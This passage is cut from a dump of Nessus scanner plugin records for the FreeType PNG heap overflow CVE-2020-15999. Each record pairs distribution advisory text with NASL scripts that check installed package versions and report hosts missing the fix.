script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/11/03\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/10/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/10/26\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2020-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^33([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 33\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC33\", reference:\"freetype-2.10.4-1.fc33\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"freetype\");\n}\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2022-12-21T14:38:20", "description": "The remote host is affected by the vulnerability described in GLSA-202010-07 (FreeType: Arbitrary code execution)\n\n A flaw in FreeType’s handling of embedded PNG bitmaps was discovered where the image height and width was not checked to be within bounds.\n Impact :\n\n A remote attacker could entice a user to open a specially crafted font file using FreeType possibly resulting in the execution of arbitrary code with the privileges of the process or a Denial of Service condition.\n Workaround :\n\n There is no known workaround at this time.", "cvss3": {"score": 6.5, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H"}, "published": "2020-10-23T00:00:00", "type": "nessus", "title": "GLSA-202010-07 : FreeType: Arbitrary code execution", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-15999"], "modified": "2022-12-06T00:00:00", "cpe": ["p-cpe:/a:gentoo:linux:freetype", "cpe:/o:gentoo:linux"], "id": "GENTOO_GLSA-202010-07.NASL", "href": "https://www.tenable.com/plugins/nessus/141837", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 202010-07.\n#\n# The advisory text is Copyright (C) 2001-2022 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(141837);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/06\");\n\n script_cve_id(\"CVE-2020-15999\");\n script_xref(name:\"GLSA\", value:\"202010-07\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0124\");\n\n script_name(english:\"GLSA-202010-07 : FreeType: Arbitrary code execution\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"The remote host is affected by the vulnerability described in GLSA-202010-07\n(FreeType: Arbitrary code execution)\n\n A flaw in FreeType’s handling of embedded PNG bitmaps was discovered\n where the image height and width was not checked to be within bounds.\n \nImpact :\n\n A remote attacker could entice a user to open a specially crafted font\n file using FreeType possibly resulting in the execution of arbitrary code\n with the privileges of the process or a Denial of Service condition.\n \nWorkaround :\n\n There is no known workaround at this time.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://savannah.nongnu.org/bugs/?59308\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/202010-07\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\n\"All FreeType users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=media-libs/freetype-2.10.3-r1'\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:freetype\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/11/03\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/10/23\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/10/23\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2020-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"media-libs/freetype\", unaffected:make_list(\"ge 2.10.3-r1\"), vulnerable:make_list(\"lt 2.10.3-r1\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:qpkg_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"FreeType\");\n}\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2022-12-21T14:39:24", "description": "Sergei Glazunov discovered a heap-based buffer overflow vulnerability in the handling of embedded PNG bitmaps in FreeType. Opening malformed fonts may result in denial of service or the execution of arbitrary code.", "cvss3": {"score": 6.5, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H"}, "published": "2020-10-23T00:00:00", "type": "nessus", "title": "Debian DSA-4777-1 : freetype - security update", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-15999"], "modified": "2022-12-06T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:freetype", "cpe:/o:debian:debian_linux:10.0"], "id": "DEBIAN_DSA-4777.NASL", "href": "https://www.tenable.com/plugins/nessus/141841", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-4777. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(141841);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/06\");\n\n script_cve_id(\"CVE-2020-15999\");\n script_xref(name:\"DSA\", value:\"4777\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0124\");\n\n script_name(english:\"Debian DSA-4777-1 : freetype - security update\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"Sergei Glazunov discovered a heap-based buffer overflow vulnerability\nin the handling of embedded PNG bitmaps in FreeType. Opening malformed\nfonts may result in denial of service or the execution of arbitrary\ncode.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=972586\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/source-package/freetype\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/buster/freetype\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.debian.org/security/2020/dsa-4777\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\n\"Upgrade the freetype packages.\n\nFor the stable distribution (buster), this problem has been fixed in\nversion 2.9.1-3+deb10u2.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:freetype\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:10.0\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/11/03\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/10/21\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/10/23\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2020-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"10.0\", prefix:\"freetype2-demos\", reference:\"2.9.1-3+deb10u2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"freetype2-doc\", reference:\"2.9.1-3+deb10u2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"libfreetype6\", reference:\"2.9.1-3+deb10u2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"libfreetype6-dev\", reference:\"2.9.1-3+deb10u2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"libfreetype6-udeb\", reference:\"2.9.1-3+deb10u2\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:deb_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2022-12-21T14:39:22", "description": "The freetype project reports :\n\nA heap buffer overflow has been found in the handling of embedded PNG bitmaps, introduced in FreeType version 2.6.", "cvss3": {"score": 6.5, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H"}, "published": "2020-10-23T00:00:00", "type": "nessus", "title": "FreeBSD : freetype2 -- heap buffer overlfow (458df97f-1440-11eb-aaec-e0d55e2a8bf9)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-15999"], "modified": "2022-12-05T00:00:00", "cpe": ["p-cpe:/a:freebsd:freebsd:freetype2", "cpe:/o:freebsd:freebsd"], "id": "FREEBSD_PKG_458DF97F144011EBAAECE0D55E2A8BF9.NASL", "href": "https://www.tenable.com/plugins/nessus/141844", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2020 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(141844);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\"CVE-2020-15999\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0124\");\n\n script_name(english:\"FreeBSD : freetype2 -- heap buffer overlfow (458df97f-1440-11eb-aaec-e0d55e2a8bf9)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote FreeBSD host is missing a security-related update.\");\n script_set_attribute(attribute:\"description\", value:\n\"The freetype project reports :\n\nA heap buffer overflow has been found in the handling of embedded PNG\nbitmaps, introduced in FreeType version 2.6.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://sourceforge.net/projects/freetype/files/freetype2/2.10.4/\");\n # https://vuxml.freebsd.org/freebsd/458df97f-1440-11eb-aaec-e0d55e2a8bf9.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?dea85915\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/10/20\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/10/22\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/10/23\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:freetype2\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"freetype2<2.10.4\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:pkg_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2022-12-21T14:39:22", "description": "This update for freetype2 fixes the following issues :\n\n - CVE-2020-15999: fixed a heap buffer overflow found in the handling of embedded PNG bitmaps (bsc#1177914).\n\nThis update was imported from the SUSE:SLE-15:Update update project.", "cvss3": {"score": 6.5, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H"}, "published": "2020-10-27T00:00:00", "type": "nessus", "title": "openSUSE Security Update : freetype2 (openSUSE-2020-1744)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-15999"], "modified": "2022-12-05T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:freetype2-debugsource", "p-cpe:/a:novell:opensuse:freetype2-devel", "p-cpe:/a:novell:opensuse:freetype2-devel-32bit", "p-cpe:/a:novell:opensuse:freetype2-profile-tti35", "p-cpe:/a:novell:opensuse:ft2demos", "p-cpe:/a:novell:opensuse:ftbench", "p-cpe:/a:novell:opensuse:ftdiff", "p-cpe:/a:novell:opensuse:ftdump", "p-cpe:/a:novell:opensuse:ftgamma", "p-cpe:/a:novell:opensuse:ftgrid", "p-cpe:/a:novell:opensuse:ftinspect", "p-cpe:/a:novell:opensuse:ftlint", "p-cpe:/a:novell:opensuse:ftmulti", "p-cpe:/a:novell:opensuse:ftstring", "p-cpe:/a:novell:opensuse:ftvalid", "p-cpe:/a:novell:opensuse:ftview", "p-cpe:/a:novell:opensuse:libfreetype6", "p-cpe:/a:novell:opensuse:libfreetype6-32bit", "p-cpe:/a:novell:opensuse:libfreetype6-32bit-debuginfo", "p-cpe:/a:novell:opensuse:libfreetype6-debuginfo", "cpe:/o:novell:opensuse:15.2"], "id": "OPENSUSE-2020-1744.NASL", "href": "https://www.tenable.com/plugins/nessus/141926", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2020-1744.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(141926);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\"CVE-2020-15999\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0124\");\n\n script_name(english:\"openSUSE Security Update : freetype2 (openSUSE-2020-1744)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote openSUSE host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"This update for freetype2 fixes the following issues :\n\n - CVE-2020-15999: fixed a heap buffer overflow found in\n the handling of embedded PNG bitmaps (bsc#1177914).\n\nThis update was imported from the SUSE:SLE-15:Update update project.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1177914\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected freetype2 packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/11/03\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/10/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/10/27\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:freetype2-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:freetype2-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:freetype2-devel-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:freetype2-profile-tti35\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ft2demos\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ftbench\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ftdiff\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ftdump\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ftgamma\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ftgrid\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ftinspect\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ftlint\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ftmulti\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ftstring\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ftvalid\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ftview\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libfreetype6\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libfreetype6-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libfreetype6-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libfreetype6-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:15.2\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"SuSE Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE15\\.2)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"15.2\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE15.2\", reference:\"freetype2-debugsource-2.10.1-lp152.2.5.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"freetype2-devel-2.10.1-lp152.2.5.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"freetype2-profile-tti35-2.10.1-lp152.2.5.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"ft2demos-2.10.1-lp152.2.5.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"ftbench-2.10.1-lp152.2.5.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"ftdiff-2.10.1-lp152.2.5.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"ftdump-2.10.1-lp152.2.5.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"ftgamma-2.10.1-lp152.2.5.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"ftgrid-2.10.1-lp152.2.5.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"ftinspect-2.10.1-lp152.2.5.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"ftlint-2.10.1-lp152.2.5.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"ftmulti-2.10.1-lp152.2.5.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"ftstring-2.10.1-lp152.2.5.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"ftvalid-2.10.1-lp152.2.5.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"ftview-2.10.1-lp152.2.5.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libfreetype6-2.10.1-lp152.2.5.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libfreetype6-debuginfo-2.10.1-lp152.2.5.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", cpu:\"x86_64\", reference:\"freetype2-devel-32bit-2.10.1-lp152.2.5.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", cpu:\"x86_64\", reference:\"libfreetype6-32bit-2.10.1-lp152.2.5.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", cpu:\"x86_64\", reference:\"libfreetype6-32bit-debuginfo-2.10.1-lp152.2.5.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"freetype2-debugsource / freetype2-devel / freetype2-profile-tti35 / etc\");\n}\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2022-12-21T14:40:42", "description": "Security fix for CVE-2020-15999.\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as possible without introducing 